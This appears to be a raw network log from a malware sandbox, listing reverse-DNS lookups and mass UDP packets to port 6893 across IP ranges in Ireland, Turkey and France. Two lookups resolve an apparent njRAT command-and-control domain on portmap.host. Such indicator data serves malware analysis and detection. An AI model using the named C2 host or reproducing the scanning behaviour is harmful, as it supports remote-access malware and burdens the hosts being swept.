US 8.8.8.8:53 73.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 80.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 81.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 82.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 83.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 84.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 85.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 86.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 87.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 88.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 89.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 90.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 91.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 92.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 93.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 94.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 95.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 96.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 97.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 98.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 99.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 100.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 101.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 102.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 103.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 104.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 105.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 106.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 107.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 108.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 109.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 110.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 111.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 112.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 113.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 114.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 115.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 116.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 118.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 117.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 119.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 120.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 121.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 123.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 122.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 124.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 125.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 126.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 127.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 128.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 129.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 130.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 131.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 132.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 133.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 134.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 135.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 136.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 137.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 138.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 139.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.114.218.91.in-addr.arpa udp
US 8.8.8.8:53 255.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 0.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 1.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 6.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 255.178.98.87.in-addr.arpa udp
US 8.8.8.8:53 0.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 1.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 6.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 23.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 38.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 39.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 42.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 43.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 44.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 46.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 47.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 73.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 80.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 255.179.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 9.193.25.171.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
IE 93.107.12.0:6893 udp
IE 93.107.12.1:6893 udp
IE 93.107.12.2:6893 udp
IE 93.107.12.3:6893 udp
IE 93.107.12.4:6893 udp
IE 93.107.12.5:6893 udp
IE 93.107.12.6:6893 udp
IE 93.107.12.7:6893 udp
IE 93.107.12.8:6893 udp
IE 93.107.12.9:6893 udp
IE 93.107.12.10:6893 udp
IE 93.107.12.11:6893 udp
IE 93.107.12.12:6893 udp
IE 93.107.12.13:6893 udp
IE 93.107.12.14:6893 udp
IE 93.107.12.15:6893 udp
IE 93.107.12.16:6893 udp
IE 93.107.12.17:6893 udp
IE 93.107.12.18:6893 udp
IE 93.107.12.19:6893 udp
IE 93.107.12.20:6893 udp
IE 93.107.12.21:6893 udp
IE 93.107.12.22:6893 udp
IE 93.107.12.23:6893 udp
IE 93.107.12.24:6893 udp
IE 93.107.12.25:6893 udp
IE 93.107.12.26:6893 udp
IE 93.107.12.27:6893 udp
IE 93.107.12.28:6893 udp
IE 93.107.12.29:6893 udp
IE 93.107.12.30:6893 udp
IE 93.107.12.31:6893 udp
TR 95.1.200.0:6893 udp
TR 95.1.200.1:6893 udp
TR 95.1.200.2:6893 udp
TR 95.1.200.3:6893 udp
TR 95.1.200.4:6893 udp
TR 95.1.200.5:6893 udp
TR 95.1.200.6:6893 udp
TR 95.1.200.7:6893 udp
TR 95.1.200.8:6893 udp
TR 95.1.200.9:6893 udp
TR 95.1.200.10:6893 udp
TR 95.1.200.11:6893 udp
TR 95.1.200.12:6893 udp
TR 95.1.200.13:6893 udp
TR 95.1.200.14:6893 udp
TR 95.1.200.15:6893 udp
TR 95.1.200.16:6893 udp
TR 95.1.200.17:6893 udp
TR 95.1.200.18:6893 udp
TR 95.1.200.19:6893 udp
TR 95.1.200.20:6893 udp
TR 95.1.200.21:6893 udp
TR 95.1.200.22:6893 udp
TR 95.1.200.23:6893 udp
TR 95.1.200.24:6893 udp
TR 95.1.200.25:6893 udp
TR 95.1.200.26:6893 udp
TR 95.1.200.27:6893 udp
TR 95.1.200.28:6893 udp
TR 95.1.200.29:6893 udp
TR 95.1.200.30:6893 udp
TR 95.1.200.31:6893 udp
FR 87.98.176.0:6893 udp
FR 87.98.176.1:6893 udp
FR 87.98.176.2:6893 udp
FR 87.98.176.3:6893 udp
FR 87.98.176.4:6893 udp
FR 87.98.176.5:6893 udp
FR 87.98.176.6:6893 udp
FR 87.98.176.7:6893 udp
FR 87.98.176.8:6893 udp
FR 87.98.176.9:6893 udp
FR 87.98.176.10:6893 udp
FR 87.98.176.11:6893 udp
FR 87.98.176.12:6893 udp
FR 87.98.176.13:6893 udp
FR 87.98.176.14:6893 udp
FR 87.98.176.15:6893 udp
FR 87.98.176.16:6893 udp
FR 87.98.176.17:6893 udp
FR 87.98.176.18:6893 udp
FR 87.98.176.19:6893 udp
FR 87.98.176.20:6893 udp
FR 87.98.176.21:6893 udp
FR 87.98.176.22:6893 udp
FR 87.98.176.23:6893 udp
FR 87.98.176.24:6893 udp
FR 87.98.176.25:6893 udp
FR 87.98.176.26:6893 udp
FR 87.98.176.27:6893 udp
FR 87.98.176.28:6893 udp
FR 87.98.176.29:6893 udp
FR 87.98.176.30:6893 udp
FR 87.98.176.31:6893 udp
FR 87.98.176.32:6893 udp
FR 87.98.176.33:6893 udp
FR 87.98.176.34:6893 udp
FR 87.98.176.35:6893 udp
FR 87.98.176.36:6893 udp
FR 87.98.176.37:6893 udp
FR 87.98.176.38:6893 udp
FR 87.98.176.39:6893 udp
FR 87.98.176.40:6893 udp
FR 87.98.176.41:6893 udp
FR 87.98.176.42:6893 udp
FR 87.98.176.43:6893 udp
FR 87.98.176.44:6893 udp
FR 87.98.176.45:6893 udp
FR 87.98.176.46:6893 udp
FR 87.98.176.47:6893 udp
FR 87.98.176.48:6893 udp
FR 87.98.176.49:6893 udp
FR 87.98.176.50:6893 udp
FR 87.98.176.51:6893 udp
FR 87.98.176.52:6893 udp
FR 87.98.176.53:6893 udp
FR 87.98.176.54:6893 udp
FR 87.98.176.55:6893 udp
FR 87.98.176.56:6893 udp
FR 87.98.176.57:6893 udp
FR 87.98.176.58:6893 udp
FR 87.98.176.59:6893 udp
FR 87.98.176.60:6893 udp
FR 87.98.176.61:6893 udp
FR 87.98.176.62:6893 udp
FR 87.98.176.63:6893 udp
FR 87.98.176.64:6893 udp
FR 87.98.176.65:6893 udp
FR 87.98.176.66:6893 udp
FR 87.98.176.67:6893 udp
FR 87.98.176.68:6893 udp
FR 87.98.176.69:6893 udp
FR 87.98.176.70:6893 udp
FR 87.98.176.71:6893 udp
FR 87.98.176.72:6893 udp
FR 87.98.176.73:6893 udp
FR 87.98.176.74:6893 udp
FR 87.98.176.75:6893 udp
FR 87.98.176.76:6893 udp
FR 87.98.176.77:6893 udp
FR 87.98.176.78:6893 udp
FR 87.98.176.79:6893 udp
FR 87.98.176.80:6893 udp
FR 87.98.176.81:6893 udp
FR 87.98.176.82:6893 udp
FR 87.98.176.83:6893 udp
FR 87.98.176.84:6893 udp
FR 87.98.176.85:6893 udp
FR 87.98.176.86:6893 udp
FR 87.98.176.87:6893 udp
FR 87.98.176.88:6893 udp
FR 87.98.176.89:6893 udp
FR 87.98.176.90:6893 udp
FR 87.98.176.91:6893 udp
FR 87.98.176.92:6893 udp
FR 87.98.176.93:6893 udp
FR 87.98.176.94:6893 udp
FR 87.98.176.95:6893 udp
FR 87.98.176.96:6893 udp
FR 87.98.176.97:6893 udp
FR 87.98.176.98:6893 udp
FR 87.98.176.99:6893 udp
FR 87.98.176.100:6893 udp
FR 87.98.176.101:6893 udp
FR 87.98.176.102:6893 udp
FR 87.98.176.103:6893 udp
FR 87.98.176.104:6893 udp
FR 87.98.176.105:6893 udp
FR 87.98.176.106:6893 udp
FR 87.98.176.107:6893 udp
FR 87.98.176.108:6893 udp
FR 87.98.176.109:6893 udp
FR 87.98.176.110:6893 udp
FR 87.98.176.111:6893 udp
FR 87.98.176.112:6893 udp
FR 87.98.176.113:6893 udp
FR 87.98.176.114:6893 udp
FR 87.98.176.115:6893 udp
FR 87.98.176.116:6893 udp
FR 87.98.176.117:6893 udp
FR 87.98.176.118:6893 udp
FR 87.98.176.119:6893 udp
FR 87.98.176.120:6893 udp
FR 87.98.176.121:6893 udp
FR 87.98.176.122:6893 udp
FR 87.98.176.123:6893 udp
FR 87.98.176.124:6893 udp
FR 87.98.176.125:6893 udp
FR 87.98.176.126:6893 udp
FR 87.98.176.127:6893 udp
FR 87.98.176.128:6893 udp
FR 87.98.176.129:6893 udp
FR 87.98.176.130:6893 udp
FR 87.98.176.131:6893 udp
FR 87.98.176.132:6893 udp
FR 87.98.176.133:6893 udp
FR 87.98.176.134:6893 udp
FR 87.98.176.135:6893 udp
FR 87.98.176.136:6893 udp
FR 87.98.176.137:6893 udp
FR 87.98.176.138:6893 udp
FR 87.98.176.139:6893 udp
FR 87.98.176.140:6893 udp
FR 87.98.176.141:6893 udp
FR 87.98.176.142:6893 udp
FR 87.98.176.143:6893 udp
FR 87.98.176.144:6893 udp
FR 87.98.176.145:6893 udp
FR 87.98.176.146:6893 udp
FR 87.98.176.147:6893 udp
FR 87.98.176.148:6893 udp
FR 87.98.176.149:6893 udp
FR 87.98.176.150:6893 udp
FR 87.98.176.151:6893 udp
FR 87.98.176.152:6893 udp
FR 87.98.176.153:6893 udp
FR 87.98.176.154:6893 udp
FR 87.98.176.155:6893 udp
FR 87.98.176.156:6893 udp
FR 87.98.176.157:6893 udp
FR 87.98.176.158:6893 udp
FR 87.98.176.159:6893 udp
FR 87.98.176.160:6893 udp
FR 87.98.176.161:6893 udp
FR 87.98.176.162:6893 udp
FR 87.98.176.163:6893 udp
FR 87.98.176.164:6893 udp
FR 87.98.176.165:6893 udp
FR 87.98.176.166:6893 udp
FR 87.98.176.167:6893 udp
FR 87.98.176.168:6893 udp
FR 87.98.176.169:6893 udp
FR 87.98.176.170:6893 udp
FR 87.98.176.171:6893 udp
FR 87.98.176.172:6893 udp
FR 87.98.176.173:6893 udp
FR 87.98.176.174:6893 udp
FR 87.98.176.175:6893 udp
FR 87.98.176.176:6893 udp
FR 87.98.176.177:6893 udp
FR 87.98.176.178:6893 udp
FR 87.98.176.179:6893 udp
FR 87.98.176.180:6893 udp
FR 87.98.176.181:6893 udp
FR 87.98.176.182:6893 udp
FR 87.98.176.183:6893 udp
FR 87.98.176.184:6893 udp
FR 87.98.176.185:6893 udp
FR 87.98.176.186:6893 udp
FR 87.98.176.187:6893 udp
FR 87.98.176.188:6893 udp
FR 87.98.176.189:6893 udp
FR 87.98.176.190:6893 udp
FR 87.98.176.191:6893 udp
FR 87.98.176.192:6893 udp
FR 87.98.176.193:6893 udp
FR 87.98.176.194:6893 udp
FR 87.98.176.195:6893 udp
FR 87.98.176.196:6893 udp
FR 87.98.176.197:6893 udp
FR 87.98.176.198:6893 udp
FR 87.98.176.199:6893 udp
FR 87.98.176.200:6893 udp
FR 87.98.176.201:6893 udp
FR 87.98.176.202:6893 udp
FR 87.98.176.203:6893 udp
FR 87.98.176.204:6893 udp
FR 87.98.176.205:6893 udp
FR 87.98.176.206:6893 udp
FR 87.98.176.207:6893 udp
FR 87.98.176.208:6893 udp
FR 87.98.176.209:6893 udp
FR 87.98.176.210:6893 udp
FR 87.98.176.211:6893 udp
FR 87.98.176.212:6893 udp
FR 87.98.176.213:6893 udp
FR 87.98.176.214:6893 udp
FR 87.98.176.215:6893 udp
FR 87.98.176.216:6893 udp
FR 87.98.176.217:6893 udp
FR 87.98.176.218:6893 udp
FR 87.98.176.219:6893 udp
FR 87.98.176.220:6893 udp
FR 87.98.176.221:6893 udp
FR 87.98.176.222:6893 udp
FR 87.98.176.223:6893 udp
FR 87.98.176.224:6893 udp
FR 87.98.176.225:6893 udp
FR 87.98.176.226:6893 udp
FR 87.98.176.227:6893 udp
FR 87.98.176.228:6893 udp
FR 87.98.176.229:6893 udp
FR 87.98.176.230:6893 udp
FR 87.98.176.231:6893 udp
FR 87.98.176.232:6893 udp
FR 87.98.176.233:6893 udp
FR 87.98.176.234:6893 udp
FR 87.98.176.235:6893 udp
FR 87.98.176.236:6893 udp
FR 87.98.176.237:6893 udp
FR 87.98.176.238:6893 udp
FR 87.98.176.239:6893 udp
FR 87.98.176.240:6893 udp
FR 87.98.176.241:6893 udp
FR 87.98.176.242:6893 udp
FR 87.98.176.243:6893 udp
FR 87.98.176.244:6893 udp
FR 87.98.176.245:6893 udp
FR 87.98.176.246:6893 udp
FR 87.98.176.247:6893 udp
FR 87.98.176.248:6893 udp
FR 87.98.176.249:6893 udp
FR 87.98.176.250:6893 udp
FR 87.98.176.251:6893 udp
FR 87.98.176.252:6893 udp
FR 87.98.176.253:6893 udp
FR 87.98.176.254:6893 udp
FR 87.98.176.255:6893 udp
FR 87.98.177.0:6893 udp
FR 87.98.177.1:6893 udp
FR 87.98.177.2:6893 udp
FR 87.98.177.3:6893 udp
FR 87.98.177.4:6893 udp
FR 87.98.177.5:6893 udp
FR 87.98.177.6:6893 udp
FR 87.98.177.7:6893 udp
FR 87.98.177.8:6893 udp
FR 87.98.177.9:6893 udp
FR 87.98.177.10:6893 udp
FR 87.98.177.11:6893 udp
FR 87.98.177.12:6893 udp
FR 87.98.177.13:6893 udp
FR 87.98.177.14:6893 udp
FR 87.98.177.15:6893 udp
FR 87.98.177.16:6893 udp
FR 87.98.177.17:6893 udp
FR 87.98.177.18:6893 udp
FR 87.98.177.19:6893 udp
FR 87.98.177.20:6893 udp
FR 87.98.177.21:6893 udp
FR 87.98.177.22:6893 udp
FR 87.98.177.23:6893 udp
FR 87.98.177.24:6893 udp
FR 87.98.177.25:6893 udp
FR 87.98.177.26:6893 udp
FR 87.98.177.27:6893 udp
FR 87.98.177.28:6893 udp
FR 87.98.177.29:6893 udp
FR 87.98.177.30:6893 udp
FR 87.98.177.31:6893 udp
FR 87.98.177.32:6893 udp
FR 87.98.177.33:6893 udp
FR 87.98.177.34:6893 udp
FR 87.98.177.35:6893 udp
FR 87.98.177.36:6893 udp
FR 87.98.177.37:6893 udp
FR 87.98.177.38:6893 udp
FR 87.98.177.39:6893 udp
FR 87.98.177.40:6893 udp
FR 87.98.177.41:6893 udp
FR 87.98.177.42:6893 udp
FR 87.98.177.43:6893 udp
FR 87.98.177.44:6893 udp
FR 87.98.177.45:6893 udp
FR 87.98.177.46:6893 udp
FR 87.98.177.47:6893 udp
FR 87.98.177.48:6893 udp
FR 87.98.177.49:6893 udp
FR 87.98.177.50:6893 udp
FR 87.98.177.51:6893 udp
FR 87.98.177.52:6893 udp
FR 87.98.177.53:6893 udp
FR 87.98.177.54:6893 udp
FR 87.98.177.55:6893 udp
FR 87.98.177.56:6893 udp
FR 87.98.177.57:6893 udp
FR 87.98.177.58:6893 udp
FR 87.98.177.59:6893 udp
FR 87.98.177.60:6893 udp
FR 87.98.177.61:6893 udp
FR 87.98.177.62:6893 udp
FR 87.98.177.63:6893 udp
FR 87.98.177.64:6893 udp
FR 87.98.177.65:6893 udp
FR 87.98.177.66:6893 udp
FR 87.98.177.67:6893 udp
FR 87.98.177.68:6893 udp
FR 87.98.177.69:6893 udp
FR 87.98.177.70:6893 udp
FR 87.98.177.71:6893 udp
FR 87.98.177.72:6893 udp
FR 87.98.177.73:6893 udp
FR 87.98.177.74:6893 udp
FR 87.98.177.75:6893 udp
FR 87.98.177.76:6893 udp
FR 87.98.177.77:6893 udp
FR 87.98.177.78:6893 udp
FR 87.98.177.79:6893 udp
FR 87.98.177.80:6893 udp
FR 87.98.177.81:6893 udp
FR 87.98.177.82:6893 udp
FR 87.98.177.83:6893 udp
FR 87.98.177.84:6893 udp
FR 87.98.177.85:6893 udp
FR 87.98.177.86:6893 udp
FR 87.98.177.87:6893 udp
FR 87.98.177.88:6893 udp
FR 87.98.177.89:6893 udp
FR 87.98.177.90:6893 udp
FR 87.98.177.91:6893 udp
FR 87.98.177.92:6893 udp
FR 87.98.177.93:6893 udp
FR 87.98.177.94:6893 udp
FR 87.98.177.95:6893 udp
FR 87.98.177.96:6893 udp
FR 87.98.177.97:6893 udp
FR 87.98.177.98:6893 udp
FR 87.98.177.99:6893 udp
FR 87.98.177.100:6893 udp
FR 87.98.177.101:6893 udp
FR 87.98.177.102:6893 udp
FR 87.98.177.103:6893 udp
FR 87.98.177.104:6893 udp
FR 87.98.177.105:6893 udp
FR 87.98.177.106:6893 udp
FR 87.98.177.107:6893 udp
FR 87.98.177.108:6893 udp
FR 87.98.177.109:6893 udp
FR 87.98.177.110:6893 udp
FR 87.98.177.111:6893 udp
FR 87.98.177.112:6893 udp
FR 87.98.177.113:6893 udp
FR 87.98.177.114:6893 udp
FR 87.98.177.115:6893 udp
FR 87.98.177.116:6893 udp
FR 87.98.177.117:6893 udp
FR 87.98.177.118:6893 udp
FR 87.98.177.119:6893 udp
FR 87.98.177.120:6893 udp
FR 87.98.177.121:6893 udp
FR 87.98.177.122:6893 udp
FR 87.98.177.123:6893 udp
FR 87.98.177.124:6893 udp
FR 87.98.177.125:6893 udp
FR 87.98.177.126:6893 udp
FR 87.98.177.127:6893 udp
FR 87.98.177.128:6893 udp
FR 87.98.177.129:6893 udp
FR 87.98.177.130:6893 udp
FR 87.98.177.131:6893 udp
FR 87.98.177.132:6893 udp
FR 87.98.177.133:6893 udp
FR 87.98.177.134:6893 udp
FR 87.98.177.135:6893 udp
FR 87.98.177.136:6893 udp
FR 87.98.177.137:6893 udp
FR 87.98.177.138:6893 udp
FR 87.98.177.139:6893 udp
FR 87.98.177.140:6893 udp
FR 87.98.177.141:6893 udp
FR 87.98.177.142:6893 udp
FR 87.98.177.143:6893 udp
FR 87.98.177.144:6893 udp
FR 87.98.177.145:6893 udp
FR 87.98.177.146:6893 udp
FR 87.98.177.147:6893 udp
FR 87.98.177.148:6893 udp
FR 87.98.177.149:6893 udp
FR 87.98.177.150:6893 udp
FR 87.98.177.151:6893 udp
FR 87.98.177.152:6893 udp
FR 87.98.177.153:6893 udp
FR 87.98.177.154:6893 udp
FR 87.98.177.155:6893 udp
FR 87.98.177.156:6893 udp
FR 87.98.177.157:6893 udp
FR 87.98.177.158:6893 udp
FR 87.98.177.159:6893 udp
FR 87.98.177.160:6893 udp
FR 87.98.177.161:6893 udp
FR 87.98.177.162:6893 udp
FR 87.98.177.163:6893 udp
FR 87.98.177.164:6893 udp
FR 87.98.177.165:6893 udp
FR 87.98.177.166:6893 udp
FR 87.98.177.167:6893 udp
FR 87.98.177.168:6893 udp
FR 87.98.177.169:6893 udp
FR 87.98.177.170:6893 udp
FR 87.98.177.171:6893 udp
FR 87.98.177.172:6893 udp
FR 87.98.177.173:6893 udp
FR 87.98.177.174:6893 udp
FR 87.98.177.175:6893 udp
FR 87.98.177.176:6893 udp
FR 87.98.177.177:6893 udp
FR 87.98.177.178:6893 udp
FR 87.98.177.179:6893 udp
FR 87.98.177.180:6893 udp
FR 87.98.177.181:6893 udp
FR 87.98.177.182:6893 udp
FR 87.98.177.183:6893 udp
FR 87.98.177.184:6893 udp
FR 87.98.177.185:6893 udp
FR 87.98.177.186:6893 udp
FR 87.98.177.187:6893 udp
FR 87.98.177.188:6893 udp
FR 87.98.177.189:6893 udp
FR 87.98.177.190:6893 udp
FR 87.98.177.191:6893 udp
FR 87.98.177.192:6893 udp
FR 87.98.177.193:6893 udp
FR 87.98.177.194:6893 udp
FR 87.98.177.195:6893 udp
FR 87.98.177.196:6893 udp
FR 87.98.177.197:6893 udp
FR 87.98.177.198:6893 udp
FR 87.98.177.199:6893 udp
FR 87.98.177.200:6893 udp
FR 87.98.177.201:6893 udp
FR 87.98.177.202:6893 udp
FR 87.98.177.203:6893 udp
FR 87.98.177.204:6893 udp
FR 87.98.177.205:6893 udp
FR 87.98.177.206:6893 udp
FR 87.98.177.207:6893 udp
FR 87.98.177.208:6893 udp
FR 87.98.177.209:6893 udp
FR 87.98.177.210:6893 udp
FR 87.98.177.211:6893 udp
FR 87.98.177.212:6893 udp
FR 87.98.177.213:6893 udp
FR 87.98.177.214:6893 udp
FR 87.98.177.215:6893 udp
FR 87.98.177.216:6893 udp
FR 87.98.177.217:6893 udp
FR 87.98.177.218:6893 udp
FR 87.98.177.219:6893 udp
FR 87.98.177.220:6893 udp
FR 87.98.177.221:6893 udp
FR 87.98.177.222:6893 udp
FR 87.98.177.223:6893 udp
FR 87.98.177.224:6893 udp
FR 87.98.177.225:6893 udp
FR 87.98.177.226:6893 udp
FR 87.98.177.227:6893 udp
FR 87.98.177.228:6893 udp
FR 87.98.177.229:6893 udp
FR 87.98.177.230:6893 udp
FR 87.98.177.231:6893 udp
FR 87.98.177.232:6893 udp
FR 87.98.177.233:6893 udp
FR 87.98.177.234:6893 udp
FR 87.98.177.235:6893 udp
FR 87.98.177.236:6893 udp
FR 87.98.177.237:6893 udp
FR 87.98.177.238:6893 udp
FR 87.98.177.239:6893 udp
FR 87.98.177.240:6893 udp
FR 87.98.177.241:6893 udp
FR 87.98.177.242:6893 udp
FR 87.98.177.243:6893 udp
FR 87.98.177.244:6893 udp
FR 87.98.177.245:6893 udp
FR 87.98.177.246:6893 udp
FR 87.98.177.247:6893 udp
FR 87.98.177.248:6893 udp
FR 87.98.177.249:6893 udp
FR 87.98.177.250:6893 udp
FR 87.98.177.251:6893 udp
FR 87.98.177.252:6893 udp
FR 87.98.177.253:6893 udp
FR 87.98.177.254:6893 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
FR 87.98.177.255:6893 udp
FR 87.98.178.0:6893 udp
FR 87.98.178.1:6893 udp
FR 87.98.178.2:6893 udp
FR 87.98.178.3:6893 udp
FR 87.98.178.4:6893 udp
FR 87.98.178.5:6893 udp
